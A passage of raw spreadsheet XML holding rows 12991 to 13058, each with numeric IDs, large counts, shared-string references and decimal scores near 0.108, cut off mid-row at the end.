        <v>15039.0</v>
      </c>
      <c r="B12991" s="2">
        <v>4.1570799E7</v>
      </c>
      <c r="C12991" s="2" t="s">
        <v>12497</v>
      </c>
      <c r="D12991" s="2">
        <v>1.0</v>
      </c>
      <c r="E12991" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12991" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12992" ht="15.75" customHeight="1">
      <c r="A12992" s="1">
        <v>16059.0</v>
      </c>
      <c r="B12992" s="2">
        <v>4.5269242E7</v>
      </c>
      <c r="C12992" s="2" t="s">
        <v>12498</v>
      </c>
      <c r="D12992" s="2">
        <v>1.0</v>
      </c>
      <c r="E12992" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12992" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12993" ht="15.75" customHeight="1">
      <c r="A12993" s="1">
        <v>16557.0</v>
      </c>
      <c r="B12993" s="2">
        <v>4.6839225E7</v>
      </c>
      <c r="C12993" s="2" t="s">
        <v>12499</v>
      </c>
      <c r="D12993" s="2">
        <v>1.0</v>
      </c>
      <c r="E12993" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12993" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12994" ht="15.75" customHeight="1">
      <c r="A12994" s="1">
        <v>16670.0</v>
      </c>
      <c r="B12994" s="2">
        <v>4.7276002E7</v>
      </c>
      <c r="C12994" s="2" t="s">
        <v>12500</v>
      </c>
      <c r="D12994" s="2">
        <v>1.0</v>
      </c>
      <c r="E12994" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12994" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12995" ht="15.75" customHeight="1">
      <c r="A12995" s="1">
        <v>16796.0</v>
      </c>
      <c r="B12995" s="2">
        <v>4.7763973E7</v>
      </c>
      <c r="C12995" s="2" t="s">
        <v>12501</v>
      </c>
      <c r="D12995" s="2">
        <v>1.0</v>
      </c>
      <c r="E12995" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12995" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12996" ht="15.75" customHeight="1">
      <c r="A12996" s="1">
        <v>16806.0</v>
      </c>
      <c r="B12996" s="2">
        <v>4.7796443E7</v>
      </c>
      <c r="C12996" s="2" t="s">
        <v>12502</v>
      </c>
      <c r="D12996" s="2">
        <v>1.0</v>
      </c>
      <c r="E12996" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12996" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12997" ht="15.75" customHeight="1">
      <c r="A12997" s="1">
        <v>16828.0</v>
      </c>
      <c r="B12997" s="2">
        <v>4.7876565E7</v>
      </c>
      <c r="C12997" s="2" t="s">
        <v>12503</v>
      </c>
      <c r="D12997" s="2">
        <v>1.0</v>
      </c>
      <c r="E12997" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12997" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12998" ht="15.75" customHeight="1">
      <c r="A12998" s="1">
        <v>16980.0</v>
      </c>
      <c r="B12998" s="2">
        <v>4.8318797E7</v>
      </c>
      <c r="C12998" s="2" t="s">
        <v>12504</v>
      </c>
      <c r="D12998" s="2">
        <v>1.0</v>
      </c>
      <c r="E12998" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12998" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="12999" ht="15.75" customHeight="1">
      <c r="A12999" s="1">
        <v>17167.0</v>
      </c>
      <c r="B12999" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C12999" s="2" t="s">
        <v>12505</v>
      </c>
      <c r="D12999" s="2">
        <v>1.0</v>
      </c>
      <c r="E12999" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12999" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13000" ht="15.75" customHeight="1">
      <c r="A13000" s="1">
        <v>17596.0</v>
      </c>
      <c r="B13000" s="2">
        <v>5.0332235E7</v>
      </c>
      <c r="C13000" s="2" t="s">
        <v>12506</v>
      </c>
      <c r="D13000" s="2">
        <v>1.0</v>
      </c>
      <c r="E13000" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13000" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13001" ht="15.75" customHeight="1">
      <c r="A13001" s="1">
        <v>17656.0</v>
      </c>
      <c r="B13001" s="2">
        <v>5.0439768E7</v>
      </c>
      <c r="C13001" s="2" t="s">
        <v>12507</v>
      </c>
      <c r="D13001" s="2">
        <v>1.0</v>
      </c>
      <c r="E13001" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13001" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13002" ht="15.75" customHeight="1">
      <c r="A13002" s="1">
        <v>17897.0</v>
      </c>
      <c r="B13002" s="2">
        <v>5.1093154E7</v>
      </c>
      <c r="C13002" s="2" t="s">
        <v>12508</v>
      </c>
      <c r="D13002" s="2">
        <v>1.0</v>
      </c>
      <c r="E13002" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13002" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13003" ht="15.75" customHeight="1">
      <c r="A13003" s="1">
        <v>18043.0</v>
      </c>
      <c r="B13003" s="2">
        <v>5.1560341E7</v>
      </c>
      <c r="C13003" s="2" t="s">
        <v>12509</v>
      </c>
      <c r="D13003" s="2">
        <v>1.0</v>
      </c>
      <c r="E13003" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13003" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13004" ht="15.75" customHeight="1">
      <c r="A13004" s="1">
        <v>18906.0</v>
      </c>
      <c r="B13004" s="2">
        <v>5.4174129E7</v>
      </c>
      <c r="C13004" s="2" t="s">
        <v>12510</v>
      </c>
      <c r="D13004" s="2">
        <v>1.0</v>
      </c>
      <c r="E13004" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13004" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13005" ht="15.75" customHeight="1">
      <c r="A13005" s="1">
        <v>18989.0</v>
      </c>
      <c r="B13005" s="2">
        <v>5.4418961E7</v>
      </c>
      <c r="C13005" s="2" t="s">
        <v>12511</v>
      </c>
      <c r="D13005" s="2">
        <v>1.0</v>
      </c>
      <c r="E13005" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13005" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13006" ht="15.75" customHeight="1">
      <c r="A13006" s="1">
        <v>18999.0</v>
      </c>
      <c r="B13006" s="2">
        <v>5.4439513E7</v>
      </c>
      <c r="C13006" s="2" t="s">
        <v>12512</v>
      </c>
      <c r="D13006" s="2">
        <v>1.0</v>
      </c>
      <c r="E13006" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13006" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13007" ht="15.75" customHeight="1">
      <c r="A13007" s="1">
        <v>19051.0</v>
      </c>
      <c r="B13007" s="2">
        <v>5.4578417E7</v>
      </c>
      <c r="C13007" s="2" t="s">
        <v>12513</v>
      </c>
      <c r="D13007" s="2">
        <v>1.0</v>
      </c>
      <c r="E13007" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13007" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13008" ht="15.75" customHeight="1">
      <c r="A13008" s="1">
        <v>19306.0</v>
      </c>
      <c r="B13008" s="2">
        <v>5.5227339E7</v>
      </c>
      <c r="C13008" s="2" t="s">
        <v>12514</v>
      </c>
      <c r="D13008" s="2">
        <v>1.0</v>
      </c>
      <c r="E13008" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13008" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13009" ht="15.75" customHeight="1">
      <c r="A13009" s="1">
        <v>19355.0</v>
      </c>
      <c r="B13009" s="2">
        <v>5.5419609E7</v>
      </c>
      <c r="C13009" s="2" t="s">
        <v>12515</v>
      </c>
      <c r="D13009" s="2">
        <v>1.0</v>
      </c>
      <c r="E13009" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13009" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13010" ht="15.75" customHeight="1">
      <c r="A13010" s="1">
        <v>19418.0</v>
      </c>
      <c r="B13010" s="2">
        <v>5.5630506E7</v>
      </c>
      <c r="C13010" s="2" t="s">
        <v>12516</v>
      </c>
      <c r="D13010" s="2">
        <v>1.0</v>
      </c>
      <c r="E13010" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13010" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13011" ht="15.75" customHeight="1">
      <c r="A13011" s="1">
        <v>19840.0</v>
      </c>
      <c r="B13011" s="2">
        <v>5.7079864E7</v>
      </c>
      <c r="C13011" s="2" t="s">
        <v>12517</v>
      </c>
      <c r="D13011" s="2">
        <v>1.0</v>
      </c>
      <c r="E13011" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13011" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13012" ht="15.75" customHeight="1">
      <c r="A13012" s="1">
        <v>19966.0</v>
      </c>
      <c r="B13012" s="2">
        <v>5.755251E7</v>
      </c>
      <c r="C13012" s="2" t="s">
        <v>12518</v>
      </c>
      <c r="D13012" s="2">
        <v>1.0</v>
      </c>
      <c r="E13012" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13012" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13013" ht="15.75" customHeight="1">
      <c r="A13013" s="1">
        <v>21001.0</v>
      </c>
      <c r="B13013" s="2">
        <v>1.7175836E7</v>
      </c>
      <c r="C13013" s="2" t="s">
        <v>12519</v>
      </c>
      <c r="D13013" s="2">
        <v>1.0</v>
      </c>
      <c r="E13013" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13013" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13014" ht="15.75" customHeight="1">
      <c r="A13014" s="1">
        <v>21027.0</v>
      </c>
      <c r="B13014" s="2">
        <v>1.7442473E7</v>
      </c>
      <c r="C13014" s="2" t="s">
        <v>12520</v>
      </c>
      <c r="D13014" s="2">
        <v>1.0</v>
      </c>
      <c r="E13014" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13014" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13015" ht="15.75" customHeight="1">
      <c r="A13015" s="1">
        <v>22586.0</v>
      </c>
      <c r="B13015" s="2">
        <v>3.9027867E7</v>
      </c>
      <c r="C13015" s="2" t="s">
        <v>12521</v>
      </c>
      <c r="D13015" s="2">
        <v>1.0</v>
      </c>
      <c r="E13015" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13015" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13016" ht="15.75" customHeight="1">
      <c r="A13016" s="1">
        <v>22990.0</v>
      </c>
      <c r="B13016" s="2">
        <v>4942566.0</v>
      </c>
      <c r="C13016" s="2" t="s">
        <v>12522</v>
      </c>
      <c r="D13016" s="2">
        <v>1.0</v>
      </c>
      <c r="E13016" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13016" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13017" ht="15.75" customHeight="1">
      <c r="A13017" s="1">
        <v>23114.0</v>
      </c>
      <c r="B13017" s="2">
        <v>5119989.0</v>
      </c>
      <c r="C13017" s="2" t="s">
        <v>12523</v>
      </c>
      <c r="D13017" s="2">
        <v>1.0</v>
      </c>
      <c r="E13017" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13017" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13018" ht="15.75" customHeight="1">
      <c r="A13018" s="1">
        <v>23614.0</v>
      </c>
      <c r="B13018" s="2">
        <v>6458822.0</v>
      </c>
      <c r="C13018" s="2" t="s">
        <v>12524</v>
      </c>
      <c r="D13018" s="2">
        <v>1.0</v>
      </c>
      <c r="E13018" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13018" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13019" ht="15.75" customHeight="1">
      <c r="A13019" s="1">
        <v>24582.0</v>
      </c>
      <c r="B13019" s="2">
        <v>1.1328985E7</v>
      </c>
      <c r="C13019" s="2" t="s">
        <v>12525</v>
      </c>
      <c r="D13019" s="2">
        <v>1.0</v>
      </c>
      <c r="E13019" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13019" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13020" ht="15.75" customHeight="1">
      <c r="A13020" s="1">
        <v>26478.0</v>
      </c>
      <c r="B13020" s="2">
        <v>1.7442472E7</v>
      </c>
      <c r="C13020" s="2" t="s">
        <v>12520</v>
      </c>
      <c r="D13020" s="2">
        <v>1.0</v>
      </c>
      <c r="E13020" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13020" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13021" ht="15.75" customHeight="1">
      <c r="A13021" s="1">
        <v>26793.0</v>
      </c>
      <c r="B13021" s="2">
        <v>1.8611733E7</v>
      </c>
      <c r="C13021" s="2" t="s">
        <v>12526</v>
      </c>
      <c r="D13021" s="2">
        <v>1.0</v>
      </c>
      <c r="E13021" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13021" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13022" ht="15.75" customHeight="1">
      <c r="A13022" s="1">
        <v>27010.0</v>
      </c>
      <c r="B13022" s="2">
        <v>1.9968721E7</v>
      </c>
      <c r="C13022" s="2" t="s">
        <v>12527</v>
      </c>
      <c r="D13022" s="2">
        <v>1.0</v>
      </c>
      <c r="E13022" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13022" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13023" ht="15.75" customHeight="1">
      <c r="A13023" s="1">
        <v>27401.0</v>
      </c>
      <c r="B13023" s="2">
        <v>2.180135E7</v>
      </c>
      <c r="C13023" s="2" t="s">
        <v>12528</v>
      </c>
      <c r="D13023" s="2">
        <v>1.0</v>
      </c>
      <c r="E13023" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13023" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13024" ht="15.75" customHeight="1">
      <c r="A13024" s="1">
        <v>27458.0</v>
      </c>
      <c r="B13024" s="2">
        <v>2.1985371E7</v>
      </c>
      <c r="C13024" s="2" t="s">
        <v>12529</v>
      </c>
      <c r="D13024" s="2">
        <v>1.0</v>
      </c>
      <c r="E13024" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13024" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13025" ht="15.75" customHeight="1">
      <c r="A13025" s="1">
        <v>28615.0</v>
      </c>
      <c r="B13025" s="2">
        <v>2.7157573E7</v>
      </c>
      <c r="C13025" s="6" t="s">
        <v>12530</v>
      </c>
      <c r="D13025" s="2">
        <v>1.0</v>
      </c>
      <c r="E13025" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13025" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13026" ht="15.75" customHeight="1">
      <c r="A13026" s="1">
        <v>28884.0</v>
      </c>
      <c r="B13026" s="2">
        <v>2.9229718E7</v>
      </c>
      <c r="C13026" s="2" t="s">
        <v>12531</v>
      </c>
      <c r="D13026" s="2">
        <v>1.0</v>
      </c>
      <c r="E13026" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13026" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13027" ht="15.75" customHeight="1">
      <c r="A13027" s="1">
        <v>29439.0</v>
      </c>
      <c r="B13027" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C13027" s="2" t="s">
        <v>12532</v>
      </c>
      <c r="D13027" s="2">
        <v>1.0</v>
      </c>
      <c r="E13027" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13027" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13028" ht="15.75" customHeight="1">
      <c r="A13028" s="1">
        <v>29827.0</v>
      </c>
      <c r="B13028" s="2">
        <v>3.5313604E7</v>
      </c>
      <c r="C13028" s="2" t="s">
        <v>12533</v>
      </c>
      <c r="D13028" s="2">
        <v>1.0</v>
      </c>
      <c r="E13028" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13028" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13029" ht="15.75" customHeight="1">
      <c r="A13029" s="1">
        <v>29987.0</v>
      </c>
      <c r="B13029" s="2">
        <v>3611087.0</v>
      </c>
      <c r="C13029" s="2" t="s">
        <v>12534</v>
      </c>
      <c r="D13029" s="2">
        <v>1.0</v>
      </c>
      <c r="E13029" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13029" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13030" ht="15.75" customHeight="1">
      <c r="A13030" s="1">
        <v>30193.0</v>
      </c>
      <c r="B13030" s="2">
        <v>3.7232715E7</v>
      </c>
      <c r="C13030" s="2" t="s">
        <v>12535</v>
      </c>
      <c r="D13030" s="2">
        <v>1.0</v>
      </c>
      <c r="E13030" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13030" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13031" ht="15.75" customHeight="1">
      <c r="A13031" s="1">
        <v>30207.0</v>
      </c>
      <c r="B13031" s="2">
        <v>3.7361992E7</v>
      </c>
      <c r="C13031" s="2" t="s">
        <v>12536</v>
      </c>
      <c r="D13031" s="2">
        <v>1.0</v>
      </c>
      <c r="E13031" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13031" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13032" ht="15.75" customHeight="1">
      <c r="A13032" s="1">
        <v>30451.0</v>
      </c>
      <c r="B13032" s="2">
        <v>3.9441451E7</v>
      </c>
      <c r="C13032" s="2" t="s">
        <v>12537</v>
      </c>
      <c r="D13032" s="2">
        <v>1.0</v>
      </c>
      <c r="E13032" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13032" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13033" ht="15.75" customHeight="1">
      <c r="A13033" s="1">
        <v>30458.0</v>
      </c>
      <c r="B13033" s="2">
        <v>3.9475105E7</v>
      </c>
      <c r="C13033" s="2" t="s">
        <v>12538</v>
      </c>
      <c r="D13033" s="2">
        <v>1.0</v>
      </c>
      <c r="E13033" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13033" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13034" ht="15.75" customHeight="1">
      <c r="A13034" s="1">
        <v>31526.0</v>
      </c>
      <c r="B13034" s="2">
        <v>5088806.0</v>
      </c>
      <c r="C13034" s="2" t="s">
        <v>12539</v>
      </c>
      <c r="D13034" s="2">
        <v>1.0</v>
      </c>
      <c r="E13034" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13034" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13035" ht="15.75" customHeight="1">
      <c r="A13035" s="1">
        <v>31781.0</v>
      </c>
      <c r="B13035" s="2">
        <v>5225181.0</v>
      </c>
      <c r="C13035" s="2" t="s">
        <v>12540</v>
      </c>
      <c r="D13035" s="2">
        <v>1.0</v>
      </c>
      <c r="E13035" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13035" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13036" ht="15.75" customHeight="1">
      <c r="A13036" s="1">
        <v>32257.0</v>
      </c>
      <c r="B13036" s="2">
        <v>5.5099953E7</v>
      </c>
      <c r="C13036" s="2" t="s">
        <v>12541</v>
      </c>
      <c r="D13036" s="2">
        <v>1.0</v>
      </c>
      <c r="E13036" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13036" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13037" ht="15.75" customHeight="1">
      <c r="A13037" s="1">
        <v>33614.0</v>
      </c>
      <c r="B13037" s="2">
        <v>8343259.0</v>
      </c>
      <c r="C13037" s="2" t="s">
        <v>12542</v>
      </c>
      <c r="D13037" s="2">
        <v>1.0</v>
      </c>
      <c r="E13037" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13037" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13038" ht="15.75" customHeight="1">
      <c r="A13038" s="1">
        <v>34193.0</v>
      </c>
      <c r="B13038" s="2">
        <v>9969851.0</v>
      </c>
      <c r="C13038" s="2" t="s">
        <v>12543</v>
      </c>
      <c r="D13038" s="2">
        <v>1.0</v>
      </c>
      <c r="E13038" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13038" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="13039" ht="15.75" customHeight="1">
      <c r="A13039" s="1">
        <v>14630.0</v>
      </c>
      <c r="B13039" s="2">
        <v>4.0305905E7</v>
      </c>
      <c r="C13039" s="2" t="s">
        <v>12544</v>
      </c>
      <c r="D13039" s="2">
        <v>1.0</v>
      </c>
      <c r="E13039" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13039" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="13040" ht="15.75" customHeight="1">
      <c r="A13040" s="1">
        <v>23488.0</v>
      </c>
      <c r="B13040" s="2">
        <v>5.7420176E7</v>
      </c>
      <c r="C13040" s="2" t="s">
        <v>12545</v>
      </c>
      <c r="D13040" s="2">
        <v>1.0</v>
      </c>
      <c r="E13040" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13040" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="13041" ht="15.75" customHeight="1">
      <c r="A13041" s="1">
        <v>28485.0</v>
      </c>
      <c r="B13041" s="2">
        <v>2.6668428E7</v>
      </c>
      <c r="C13041" s="2" t="s">
        <v>12546</v>
      </c>
      <c r="D13041" s="2">
        <v>1.0</v>
      </c>
      <c r="E13041" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13041" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="13042" ht="15.75" customHeight="1">
      <c r="A13042" s="1">
        <v>31082.0</v>
      </c>
      <c r="B13042" s="2">
        <v>4.8330947E7</v>
      </c>
      <c r="C13042" s="2" t="s">
        <v>12547</v>
      </c>
      <c r="D13042" s="2">
        <v>1.0</v>
      </c>
      <c r="E13042" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13042" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="13043" ht="15.75" customHeight="1">
      <c r="A13043" s="1">
        <v>32053.0</v>
      </c>
      <c r="B13043" s="2">
        <v>5375224.0</v>
      </c>
      <c r="C13043" s="2" t="s">
        <v>12548</v>
      </c>
      <c r="D13043" s="2">
        <v>1.0</v>
      </c>
      <c r="E13043" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13043" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="13044" ht="15.75" customHeight="1">
      <c r="A13044" s="1">
        <v>33569.0</v>
      </c>
      <c r="B13044" s="2">
        <v>8230715.0</v>
      </c>
      <c r="C13044" s="2" t="s">
        <v>12549</v>
      </c>
      <c r="D13044" s="2">
        <v>1.0</v>
      </c>
      <c r="E13044" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13044" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="13045" ht="15.75" customHeight="1">
      <c r="A13045" s="1">
        <v>13385.0</v>
      </c>
      <c r="B13045" s="2">
        <v>3.4932766E7</v>
      </c>
      <c r="C13045" s="2" t="s">
        <v>12550</v>
      </c>
      <c r="D13045" s="2">
        <v>1.0</v>
      </c>
      <c r="E13045" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13045" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="13046" ht="15.75" customHeight="1">
      <c r="A13046" s="1">
        <v>15293.0</v>
      </c>
      <c r="B13046" s="2">
        <v>4.2424764E7</v>
      </c>
      <c r="C13046" s="2" t="s">
        <v>12551</v>
      </c>
      <c r="D13046" s="2">
        <v>1.0</v>
      </c>
      <c r="E13046" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13046" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="13047" ht="15.75" customHeight="1">
      <c r="A13047" s="1">
        <v>17287.0</v>
      </c>
      <c r="B13047" s="2">
        <v>4.9214289E7</v>
      </c>
      <c r="C13047" s="2" t="s">
        <v>12552</v>
      </c>
      <c r="D13047" s="2">
        <v>1.0</v>
      </c>
      <c r="E13047" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13047" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="13048" ht="15.75" customHeight="1">
      <c r="A13048" s="1">
        <v>25236.0</v>
      </c>
      <c r="B13048" s="2">
        <v>1.3378602E7</v>
      </c>
      <c r="C13048" s="2" t="s">
        <v>12553</v>
      </c>
      <c r="D13048" s="2">
        <v>1.0</v>
      </c>
      <c r="E13048" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13048" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="13049" ht="15.75" customHeight="1">
      <c r="A13049" s="1">
        <v>29746.0</v>
      </c>
      <c r="B13049" s="2">
        <v>3.4710829E7</v>
      </c>
      <c r="C13049" s="2" t="s">
        <v>12554</v>
      </c>
      <c r="D13049" s="2">
        <v>1.0</v>
      </c>
      <c r="E13049" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13049" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="13050" ht="15.75" customHeight="1">
      <c r="A13050" s="1">
        <v>31896.0</v>
      </c>
      <c r="B13050" s="2">
        <v>5293780.0</v>
      </c>
      <c r="C13050" s="2" t="s">
        <v>12555</v>
      </c>
      <c r="D13050" s="2">
        <v>1.0</v>
      </c>
      <c r="E13050" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13050" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="13051" ht="15.75" customHeight="1">
      <c r="A13051" s="1">
        <v>32137.0</v>
      </c>
      <c r="B13051" s="2">
        <v>5.4148414E7</v>
      </c>
      <c r="C13051" s="2" t="s">
        <v>12556</v>
      </c>
      <c r="D13051" s="2">
        <v>1.0</v>
      </c>
      <c r="E13051" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13051" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="13052" ht="15.75" customHeight="1">
      <c r="A13052" s="1">
        <v>32380.0</v>
      </c>
      <c r="B13052" s="2">
        <v>5611938.0</v>
      </c>
      <c r="C13052" s="2" t="s">
        <v>12256</v>
      </c>
      <c r="D13052" s="2">
        <v>1.0</v>
      </c>
      <c r="E13052" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13052" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="13053" ht="15.75" customHeight="1">
      <c r="A13053" s="1">
        <v>8092.0</v>
      </c>
      <c r="B13053" s="2">
        <v>5.3049085E7</v>
      </c>
      <c r="C13053" s="2" t="s">
        <v>12557</v>
      </c>
      <c r="D13053" s="2">
        <v>1.0</v>
      </c>
      <c r="E13053" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13053" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="13054" ht="15.75" customHeight="1">
      <c r="A13054" s="1">
        <v>25769.0</v>
      </c>
      <c r="B13054" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C13054" s="2" t="s">
        <v>12558</v>
      </c>
      <c r="D13054" s="2">
        <v>1.0</v>
      </c>
      <c r="E13054" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13054" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="13055" ht="15.75" customHeight="1">
      <c r="A13055" s="1">
        <v>25913.0</v>
      </c>
      <c r="B13055" s="2">
        <v>1.5091676E7</v>
      </c>
      <c r="C13055" s="2" t="s">
        <v>12559</v>
      </c>
      <c r="D13055" s="2">
        <v>1.0</v>
      </c>
      <c r="E13055" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13055" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="13056" ht="15.75" customHeight="1">
      <c r="A13056" s="1">
        <v>2618.0</v>
      </c>
      <c r="B13056" s="2">
        <v>3.447543E7</v>
      </c>
      <c r="C13056" s="2" t="s">
        <v>12560</v>
      </c>
      <c r="D13056" s="2">
        <v>1.0</v>
      </c>
      <c r="E13056" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13056" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="13057" ht="15.75" customHeight="1">
      <c r="A13057" s="1">
        <v>3374.0</v>
      </c>
      <c r="B13057" s="2">
        <v>3.7916921E7</v>
      </c>
      <c r="C13057" s="2" t="s">
        <v>12561</v>
      </c>
      <c r="D13057" s="2">
        <v>1.0</v>
      </c>
      <c r="E13057" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13057" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="13058" ht="15.75" customHeight="1">
      <c r="A13058" s="1">
        <v>6007.0</v>
      </c>
      <c r="B13058" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C13058" s="2" t="s">
